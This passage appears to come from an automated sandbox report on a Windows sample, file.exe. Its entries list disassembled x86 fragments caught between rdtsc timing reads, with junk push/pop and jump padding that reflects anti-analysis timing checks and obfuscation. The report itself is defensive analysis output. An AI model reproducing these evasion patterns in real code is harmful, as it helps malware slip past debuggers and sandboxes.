            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F025E second address: 4F0264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0264 second address: 4F0283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F45D5047A38h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0283 second address: 4F02DB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F45D50449A6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F45D50449B9h 0x00000014 jmp 00007F45D50449B3h 0x00000019 jmp 00007F45D50449B8h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F02DB second address: 4F02DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523FBA second address: 523FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F45D50449B4h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5243AB second address: 5243B7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F45D5047A26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525F9F second address: 525FA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5200 second address: 4F520F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A2Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528CEA second address: 528D05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528D05 second address: 528D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D5047A2Eh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F87BB second address: 4F87C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F45D50449A6h 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F87C8 second address: 4F87DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A30h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B454 second address: 52B460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F45D50449A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B460 second address: 52B465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B465 second address: 52B46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B46B second address: 52B473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D86F second address: 52D878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C176 second address: 52C17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C17B second address: 52C181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52DAC4 second address: 52DAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52DAC8 second address: 52DAD6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F45D50449A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52DAD6 second address: 52DADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52ED66 second address: 52ED6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52ED6B second address: 52ED71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532A70 second address: 532A7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F45D50449A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531E81 second address: 531E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D5047A2Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531E94 second address: 531E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531E98 second address: 531EB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A32h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531EB7 second address: 531ED7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F45D50449B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jng 00007F45D50449A6h 0x00000012 pop ecx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531ED7 second address: 531F02 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F45D5047A41h 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F45D5047A26h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5321C6 second address: 5321EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B4h 0x00000007 pushad 0x00000008 jmp 00007F45D50449AFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532356 second address: 532375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 jmp 00007F45D5047A36h 0x0000000d pop ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532375 second address: 532390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45D50449B4h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5325FB second address: 532616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532616 second address: 532620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F45D50449A6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532620 second address: 532664 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F45D5047A30h 0x00000010 jmp 00007F45D5047A36h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532664 second address: 532668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53633E second address: 536355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F45D5047A28h 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536355 second address: 53635A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53635A second address: 5363F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F45D5047A31h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 jp 00007F45D5047A2Ch 0x0000001b jmp 00007F45D5047A33h 0x00000020 popad 0x00000021 pop eax 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F45D5047A28h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Bh 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c mov edi, 7C7DAD13h 0x00000041 mov esi, 673E8573h 0x00000046 call 00007F45D5047A29h 0x0000004b jno 00007F45D5047A32h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jc 00007F45D5047A2Ch 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5363F9 second address: 5363FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5363FD second address: 536435 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F45D5047A35h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F45D5047A35h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536435 second address: 536477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jmp 00007F45D50449B0h 0x00000011 push eax 0x00000012 jmp 00007F45D50449B3h 0x00000017 pop eax 0x00000018 popad 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 pop edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5367B3 second address: 5367C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F45D5047A28h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536F96 second address: 536FA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536FA8 second address: 536FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537032 second address: 537060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F45D50449AAh 0x0000000f mov dword ptr [ebp+1244BBE1h], ecx 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537060 second address: 537064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537064 second address: 537068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537068 second address: 53706E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53706E second address: 53708B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F45D50449AAh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jne 00007F45D50449A6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537110 second address: 537123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F45D5047A26h 0x0000000a popad 0x0000000b jo 00007F45D5047A2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539572 second address: 5395BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D3843h], ebx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F45D50449A8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov di, dx 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D399Ah] 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b ja 00007F45D50449A6h 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538DB4 second address: 538DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45D5047A2Dh 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f jc 00007F45D5047A2Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5395BA second address: 5395C4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F45D50449A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5395C4 second address: 5395D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D5047A2Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AB9E second address: 53ABA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53ABA2 second address: 53ABB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53ABB0 second address: 53ABF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 mov di, bx 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F45D50449A8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+122D2C18h] 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D1C42h], edx 0x00000034 jmp 00007F45D50449ABh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push eax 0x0000003e pop eax 0x0000003f pop eax 0x00000040 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C265 second address: 53C26B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C26B second address: 53C27A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C27A second address: 53C27E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C27E second address: 53C284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C284 second address: 53C28A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53CDCD second address: 53CDD7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F45D50449ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5428B8 second address: 5428BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F95D second address: 53F978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547E17 second address: 547E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542A54 second address: 542A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549E85 second address: 549E8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549E8A second address: 549EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c jmp 00007F45D50449B2h 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543B63 second address: 543B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542A5A second address: 542A5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549EAC second address: 549EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 mov ebx, dword ptr [ebp+1245262Bh] 0x0000000f push 00000000h 0x00000011 or dword ptr [ebp+122D567Eh], ecx 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D5679h], esi 0x0000001f push eax 0x00000020 jbe 00007F45D5047A57h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F45D5047A33h 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543B6E second address: 543BD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F45D50449A8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 movzx ebx, bx 0x0000002a sub ebx, dword ptr [ebp+122D2CD8h] 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov bh, dh 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 clc 0x00000041 mov eax, dword ptr [ebp+122D0BCDh] 0x00000047 sub dword ptr [ebp+12477143h], edi 0x0000004d push FFFFFFFFh 0x0000004f mov bh, C2h 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543BD3 second address: 543BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543BDC second address: 543BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542A5E second address: 542AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007F45D5047A30h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F45D5047A28h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov ebx, dword ptr [ebp+122D2AC1h] 0x00000030 mov edi, dword ptr [ebp+122D2C1Ch] 0x00000036 push dword ptr fs:[00000000h] 0x0000003d sbb di, 6458h 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 mov eax, dword ptr [ebp+122D10C9h] 0x0000004f push 00000000h 0x00000051 push edi 0x00000052 call 00007F45D5047A28h 0x00000057 pop edi 0x00000058 mov dword ptr [esp+04h], edi 0x0000005c add dword ptr [esp+04h], 00000014h 0x00000064 inc edi 0x00000065 push edi 0x00000066 ret 0x00000067 pop edi 0x00000068 ret 0x00000069 or edi, dword ptr [ebp+122D2BACh] 0x0000006f push FFFFFFFFh 0x00000071 mov bh, al 0x00000073 nop 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 jng 00007F45D5047A26h 0x0000007e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542AEC second address: 542AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544BAF second address: 544BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AD2E second address: 54AD34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AD34 second address: 54AD38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AD38 second address: 54AD3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544CA7 second address: 544CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AD3C second address: 54ADD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F45D50449A8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push ebx 0x00000026 mov dword ptr [ebp+1245CCEFh], esi 0x0000002c pop edi 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F45D50449A8h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b jmp 